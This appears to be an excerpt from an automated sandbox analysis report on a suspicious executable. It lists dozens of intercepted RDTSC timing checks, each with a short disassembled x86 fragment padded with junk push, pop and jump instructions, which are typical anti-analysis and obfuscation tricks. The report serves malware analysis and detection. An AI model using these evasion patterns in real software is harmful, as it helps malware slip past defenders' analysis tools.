                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3C188A second address: 3C189F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4785B0BF4Dh 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3C189F second address: 3C1932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a call 00007F4784F102D9h 0x0000000f mov ebx, dword ptr [ebp+122D2B0Ch] 0x00000015 pop edi 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov dword ptr [ebp+122D38F8h], edi 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F4784F102C8h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov eax, dword ptr [ebp+122D1175h] 0x0000004a mov edi, ebx 0x0000004c push FFFFFFFFh 0x0000004e je 00007F4784F102DAh 0x00000054 jmp 00007F4784F102D4h 0x00000059 push eax 0x0000005a pushad 0x0000005b push edi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3C1932 second address: 3C193B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3C9F32 second address: 3C9F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4784F102C6h 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3C9F3C second address: 3C9F40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3CA081 second address: 3CA08F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4784F102C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3CA08F second address: 3CA0A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3CA0A4 second address: 3CA0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3CBDB1 second address: 3CBDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF53h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F4785B0BF46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3CBDD3 second address: 3CBDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3CBDD7 second address: 3CBDDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3CBDDB second address: 3CBDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F4784F102D1h 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D09EF second address: 3D09F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D09F3 second address: 3D0A0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CCh 0x00000007 jmp 00007F4784F102CBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D0A0E second address: 3D0A25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F4785B0BF46h 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 36E9C4 second address: 36E9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 36E9CA second address: 36E9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D2142 second address: 3D2146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D6734 second address: 3D6738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D6738 second address: 3D673E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D673E second address: 3D6753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F4785B0BF46h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D6A09 second address: 3D6A2B instructions: 0x00000000 rdtsc 0x00000002 js 00007F4784F102DAh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F4784F102D2h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D6A2B second address: 3D6A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D6B78 second address: 3D6B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D6B7C second address: 3D6B97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4785B0BF55h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D6B97 second address: 3D6BA1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4784F102CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D6D59 second address: 3D6D79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4785B0BF59h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D7028 second address: 3D7049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4784F102CBh 0x00000009 popad 0x0000000a jp 00007F4784F102CEh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D7049 second address: 3D7055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4785B0BF46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D7055 second address: 3D706D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4784F102C6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F4784F102CEh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D706D second address: 3D7071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3D7071 second address: 3D7085 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102CFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DCDEE second address: 3DCE22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnl 00007F4785B0BF46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push esi 0x0000000e pushad 0x0000000f jmp 00007F4785B0BF53h 0x00000014 jmp 00007F4785B0BF4Bh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 366428 second address: 36642C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DB7EB second address: 3DB809 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DB809 second address: 3DB811 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DBC44 second address: 3DBC55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4785B0BF46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DBDBE second address: 3DBDC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DBDC2 second address: 3DBDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DBDC8 second address: 3DBDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F4784F102C6h 0x0000000e jmp 00007F4784F102D9h 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DBDEF second address: 3DBDF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DBF5A second address: 3DBF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4784F102C6h 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DBF64 second address: 3DBF74 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4785B0BF46h 0x00000008 je 00007F4785B0BF46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DBF74 second address: 3DBF7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DBF7A second address: 3DBF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4785B0BF46h 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DBF84 second address: 3DBF88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DC25D second address: 3DC264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DC3B4 second address: 3DC3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DC54C second address: 3DC56B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4785B0BF51h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F4785B0BF46h 0x00000013 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DC6AB second address: 3DC6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3DC6AF second address: 3DC6BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F4785B0BF46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 392249 second address: 39226C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007F4784F102C8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F4784F102CFh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 39226C second address: 392295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4785B0BF46h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007F4785B0BF4Ch 0x00000013 je 00007F4785B0BF48h 0x00000019 jc 00007F4785B0BF64h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 361351 second address: 361357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 361357 second address: 361366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 361366 second address: 36136A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E781E second address: 3E7829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4785B0BF46h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E7829 second address: 3E784E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4784F102CEh 0x00000008 pushad 0x00000009 jno 00007F4784F102C6h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E784E second address: 3E7852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E7852 second address: 3E7856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E66AC second address: 3E66B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E66B2 second address: 3E66B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E66B7 second address: 3E66BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E6F36 second address: 3E6F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4784F102DBh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jl 00007F4784F102C6h 0x00000014 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E6F5F second address: 3E6F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E6F63 second address: 3E6F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E70C4 second address: 3E70C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E70C9 second address: 3E70F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F4784F102D8h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F4784F102D2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E70F1 second address: 3E710C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4785B0BF46h 0x0000000a jmp 00007F4785B0BF51h 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E710C second address: 3E7111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E7111 second address: 3E7117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3E7260 second address: 3E7266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EA391 second address: 3EA3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF50h 0x00000009 popad 0x0000000a ja 00007F4785B0BF4Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EA3B0 second address: 3EA3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 jns 00007F4784F102C6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop eax 0x00000010 jp 00007F4784F102CEh 0x00000016 pushad 0x00000017 jmp 00007F4784F102D4h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EE9A8 second address: 3EE9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A8C12 second address: 3A8C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push esi 0x00000009 call 00007F4784F102C8h 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], esi 0x00000013 add dword ptr [esp+04h], 00000016h 0x0000001b inc esi 0x0000001c push esi 0x0000001d ret 0x0000001e pop esi 0x0000001f ret 0x00000020 movsx edx, di 0x00000023 call 00007F4784F102CAh 0x00000028 cmc 0x00000029 pop edx 0x0000002a lea eax, dword ptr [ebp+12499A18h] 0x00000030 mov dword ptr [ebp+122D1D11h], ebx 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jns 00007F4784F102CCh 0x0000003f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9251 second address: 3A925B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A925B second address: 3A925F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
